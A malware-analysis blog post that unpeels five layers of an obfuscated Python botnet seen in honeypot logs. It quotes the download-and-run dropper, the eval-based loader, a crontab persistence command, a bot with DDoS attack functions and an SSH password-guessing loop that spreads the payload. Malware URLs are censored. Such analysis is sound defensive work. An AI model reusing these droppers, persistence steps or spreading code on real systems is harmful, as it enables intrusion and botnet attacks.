Deobfuscating multiple layers of malicious python
Table of Contents
1. Background
One of my research projects analyzes large sets of honeypot logs in order to identify emerging trends in Tools Techniques and Procedures (TTPs) within deployed malware. A recent trend, reported by one of our daily statistical correlation tools, caught my eye and warranted further investigation. Since the results of my analysis may be of interest to others: here's a quick breakdown of one particular python rabbit hole. It's not amazingly complex, but it is far from simple and is generally an interesting breakdown in the usage of multiple layers of obfuscated python in malware.
2. Layer One: command line bash/ssh
The honeypot log in question turned up the following commands (formatted for readability) that started appearing at low levels on 2021-12-12. Other bot networks send similar commands hundreds and thousands of times a day, but this particular command is only caught a few times a day.
cd /tmp (( apt update -y && apt install python3 wget -y ) || ( yum update -y && yum install epel-release -y && yum install python3 wget -y )) wget -O updater.zip [MALWAREURLCENSORED] python3 updater.zip rm updater.zip && cd ~
This part isn't anything special, of course: it's a simple
downloader/dropper that first tries to make sure the tools it needs
(python3
and wget
) are installed. It does assume it's on a
debian or redhat-like system, but otherwise will still work on
other systems that have python3
and wget
pre-installed (like
many, if not most, *nix systems).
Outstanding question 1: When reading scripts like this it always
leaves me with random questions like: "what's the point of the final
cd
to $HOME
"?
3. Layer Two: the downloaded python script
The python script that was downloaded (update.zip
above) is much
more interesting (formatted for brevity and actual malware removal
as well):
import base64, codecs magic = 'aW1wb3J0IHN5cyx...BmbDoNCgkJCQlp' love = 'MvOhqlOcovOzoP5l...A0MJ1xYJkiM2yh' god = 'ZCIpDQoJCQlzeXMuZ...8gJycnKQ0KCQlh' destiny = 'LzZbWlpaVT1eM...tcQDbAPvNAPt0X' joy = '\x72\x6f\x74\x31\x33' trust = \ eval('\x6d\x61\x67\x69\x63') + \ eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + \ eval('\x67\x6f\x64') + \ eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29') eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))
First, to the author: good creative use of variable names.
So what does the above do?
- Creates 4 variables (
magic
…destiny
) with base64 encoded strings. - Creates a 5th variable (
joy
) containing the string "rot13", encoded in hexadecimal. - Create a 6th variable (
trust
) that is created by concatenating the results from multiple calls toeval()
. Each of the inputs toeval()
are further obfuscated by encoding the variable names in hexadecimal to prevent (easy) human readability. The arguments of these evals() are really:- the string 'magic', thus resulting in the contents of the
magic
variable - the contents of
codecs.decode(love, joy)
, which results in applying the rot13 substitution algorithm to the contents of thelove
variable - the
god
variable, resulting in its contents - the
destiny
variable and thus its rot13 contents
- the string 'magic', thus resulting in the contents of the
Summarizing for readability, the trust
assignment line becomes:
trust = \ magic + \ codecs.decode(love, joy) + \ god + \ codecs.decode(destiny, joy) +
The final contents of the trust
variable is a base64 string of 1824
characters. This is finally fed to base64.b64decode()
and
compiled and evaluated. This in turn decodes to yet another python
script, which is then executed.
4. Layer Three: the embedded, evaluated python script
The output of the previous step produces a longer string of python
code that is passed to compile
and eval
to run the following
code (edited for formatting and malware URL removal). I'll break
this longer script into chunks.
First, the top few lines imports things and defines the nw
variable and sets it to 12
, which I'll get back to in a minute.
import sys,os,subprocess,time nw="12"
After that is a number of functions that are just filler, from what I can tell, as they're never actually used:
def a(b): c = b*2 return c def oO1oO(OO): OOO = 0 return OO def oOOOO2(OO): OOO = 0 return OO def oOo1(OO): OOO = 0 return OO
Next there is one more defined function, which actually is used, and
is just a wrapper around os.system()
to ensure it continues in
case of any exceptions being thrown:
def abc(cl): try: os.system(cl) except: pass
Finally comes the meat of the script, which starts by checking if a
/opt/lsb/.pki
file exists on the system being penetrated and if it
contains the string from the nw
variable above ("12"). Depending
on these results, it sets the ald
variable to 1 if the file exists
and contains "12", or otherwise sets it to 0.
The importance of the ald
variable will become apparent in a minute.
I'll also question the need for the while True
component of this
script at the end of this post.
while True: try: ald = 0 try: with open('/opt/lsb/.pki', "r+") as fl: if nw in fl.read(): ald = 1 else: ald = 0 except: ald = 0
Next, the script similarly sets a crn
variable to 1 if a cronjob
has already been configured that executes the final malware binary
fuse
(as we will see a bit later).
crn = 0 try: cron = subprocess.check_output("crontab -l",shell=True).decode(\'utf-8\') if "fuse" in cron: crn = 1 else: crn = 0 except: crn = 0
Now that the script has properly probed the system for components of
its previous runs, it can actually do something with the results.
First, it checks to see if the ald
variable indicates that "12"
was in the /opt/lsb/.pki
file:
if ald == 1: print("[1]- Stopped /usr/lib/systemd/systemd-logind") sys.exit()
This check is functionally acting as a version control system,
allowing upgrades to previously compromised systems without
re-running the installation script otherwise. Thus, if the author
changed the string in the nw
variable to "13" but "12" was stored
in /opt/lsb/.pki
, the rest of the script would continue running
to self-update to the latest and greatest malware.
Outstanding question: what's the purpose of this print
message?
Note/Bug: Because of the way string searching is used for "12", it would also match "112" and any other string containing "12"; the version handling isn't as robust as it could be. But I'm certainly being picky here in my code review.
Next up, the script installs fuse
with apt
or yum
, kills any
running process named fuse
, and removes any existing fuse
binary
from /usr/sbin
:
abc(''' apt install fuse python3 -y || yum install epel-release python3 fuse -y ''') abc(''' pkill fuse; rm /usr/sbin/fuse -R ''')
Afterward, if there is no cron job installed to re-run the fuse
binary at reboot, it adds a crontab entry to do so. (Again, the
previous check for the string "fuse" in any cronjob will probably
produce some false positives.)
if crn == 0: abc('''(crontab -l 2>/dev/null || true; echo "@reboot pkill updated;nohup /usr/sbin/fuse>/dev/null &") | crontab - ''')
Finally, we get to the creation of the /opt/lsb/.pki
version number file:
abc(''' rm -R /opt/lsb/ ''') abc(''' mkdir /opt/lsb/ && echo 'keys-0 {}'>/opt/lsb/.pki '''.format(nw))
Finally, we get to the actual fuse
malware downloading, installing
and initial run. Again, we see the script using print
to log a
fake stopped message for systemd-logind
for some reason.
abc(''' wget -O /usr/sbin/fuse [MALWAREURLCENSORED] && chmod +x /usr/sbin/fuse''') abc(''' nohup /usr/sbin/fuse>/dev/null & ''') print("[1]+ Stopped /usr/lib/systemd/systemd-logind") sys.exit() except: sys.exit()
One final Outstanding question: why the while True
portion of
the script? There is no portion of the script that does not result
in sys.exit()
being called, which means the while
loop should
only ever be run once anyway.
5. Layer Four: compiled python
The final /usr/bin/fuse
binary that is installed is also a python
script, but has been compiled into a linux ELF binary. We can
determine this by examining it using strings
and/or objdump -D
and
noticing a pydata section in the ELF dump output. This pydata
section contains a compiled python (pyc) formatted block, with a 16
byte header showing that a recent version of python was used to compile
it.
We next extract this pydata section in order to extract the compiled python byte code.
objcopy -O binary --only-section=pydata \ --set-section-flags pydata=alloc fuse fuse-pythoncode.bin
We can use pyinstaller's archive_viewer.py
command to list and
extract the pieces of the saved pydata section:
cd pyinstaller PYTHONPATH=. python3 \ ./PyInstaller/utils/cliutils/archive_viewer.py -b ../fuse-pythoncode.bin | head -15
['struct', 'pyimod01_os_path', 'pyimod02_archive', 'pyimod03_importers', 'pyimod04_ctypes', 'pyiboot01_bootstrap', 'pyi_rth_pkgutil', 'pyi_rth_multiprocessing', 'pyi_rth_inspect', 'fuse', '_cffi_backend.cpython-39-x86_64-linux-gnu.so', 'bcrypt/_bcrypt.abi3.so', 'cryptography/hazmat/bindings/_openssl.abi3.so', 'cryptography/hazmat/bindings/_padding.abi3.so', 'lib-dynload/_asyncio.cpython-39-x86_64-linux-gnu.so', 'lib-dynload/_bz2.cpython-39-x86_64-linux-gnu.so', 'lib-dynload/_codecs_cn.cpython-39-x86_64-linux-gnu.so', 'lib-dynload/_codecs_hk.cpython-39-x86_64-linux-gnu.so', 'lib-dynload/_codecs_iso2022.cpython-39-x86_64-linux-gnu.so', 'lib-dynload/_codecs_jp.cpython-39-x86_64-linux-gnu.so',
We note that fuse
is also the name of the actual final python block
to be executed, so we extract this as well using the
archive_viewer.py
's X
command. But it appears to be C-compiled
cpython code so decoding it is a bit trickier. However, we're in luck
because the developer wasn't as smart as they could have been: if we
run strings strings
on file, we see 4 base64 encoded strings in the
output. Like before, 2 of these are rot13
encoded. We can then
combine them using the same techniques as the previous four strings
above (magic
… destiny
).
6. Layer Five: the final python bot code
After extracting these 4 more lines of base64 encoded strings, we get an 845 line python bot script with the following functions in it:
grep 'def ' final-packaged-python.py
def encrypt(data,key): def decrypt(data,key): def litehash(data): def getProxy(): def getRandomPayload(size): def getRandomString(size): def pack_varint(val): def pack_str(bb): def getSocket(ip, port,ifprox,recons,proxyHost=False,proxyPort=0): def getSSL(sock, host): def loader(addr): def scan(): def http_get(task_name, url, host, ip, port,ifprox, rcns): def http_fast(task_name, url, host, ip, port,ifprox, rcns): def mccrash(task_name,ip,port,hostn,ifprox, rcns): def mcbot(task_name,ip,port,hostn,ifprox, rcns): def mcping(task_name,ip,port,ifprox, rcns): def mcdata(task_name,ip,port,hostn,ifprox, rcns): def junk(task_name,ip,port,ifprox, rcns): def handshake(task_name,ip,port,ifprox, rcns): def tcp(task_name,ip,port,size,ifprox, rcns): def netty(task_name,ip,port,pkt,ifprox, rcns): def raknet(task_name,ip,port): def vse(task_name,ip,port): def udp(task_name,ip,port,size): def getHTTP(base): def download_file(url, file): def attack(method,ip,port,size,threads,times, ifprox, rcns): def getIP(): def execer(cmd): def updateProxy(url):
As we can see from this set of functions, we've finally hit the end of the obfuscation train, revealing a general daemon containing various implements of destruction. Included in this final malware toolkit is the original payload delivery string we started with at the top of this post:
payload = "cd /tmp; ... python3 updater.zip && rm updater.zip && cd ~ "
Along with it, the code to deliver it over SSH:
for i in credentials: try: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(addr, username=i[0], password=i[1]) stdin, stdout, stderr = ssh.exec_command(f'cat /proc/1') if str(stdout.read()).split('b\'')[1] != '': i, o, e = ssh.exec_command(payload) time.sleep(10) break ssh.close() except Exception as E: #print(E) time.sleep(1) continue
7. Final comments
All in all, this was an interesting trail to analyze – it demonstrates the greater level of obfuscation more talented malicious actors will use, beyond what the basic script kiddies will.
Does this (still simple-ish) type of obfuscation technique work? Yes. It almost certainly raises the author above the low-hanging fruit of average malware collection systems. For example, none of the scripts or files above appear in the industry's leading database (VirusTotal) as of the date this analysis was completed. I submitted the final python payload to VirusTotal as well, but all of the engines report "Undetected" and thus not malicious in nature – clearly an error.
The slowly increasing usage of python in active malicious actor communities will hopefully trigger more malware detection engines to beef up their automated algorithms. Hopefully.
Acknowledgments: thank you to Robert Story for reviewing this!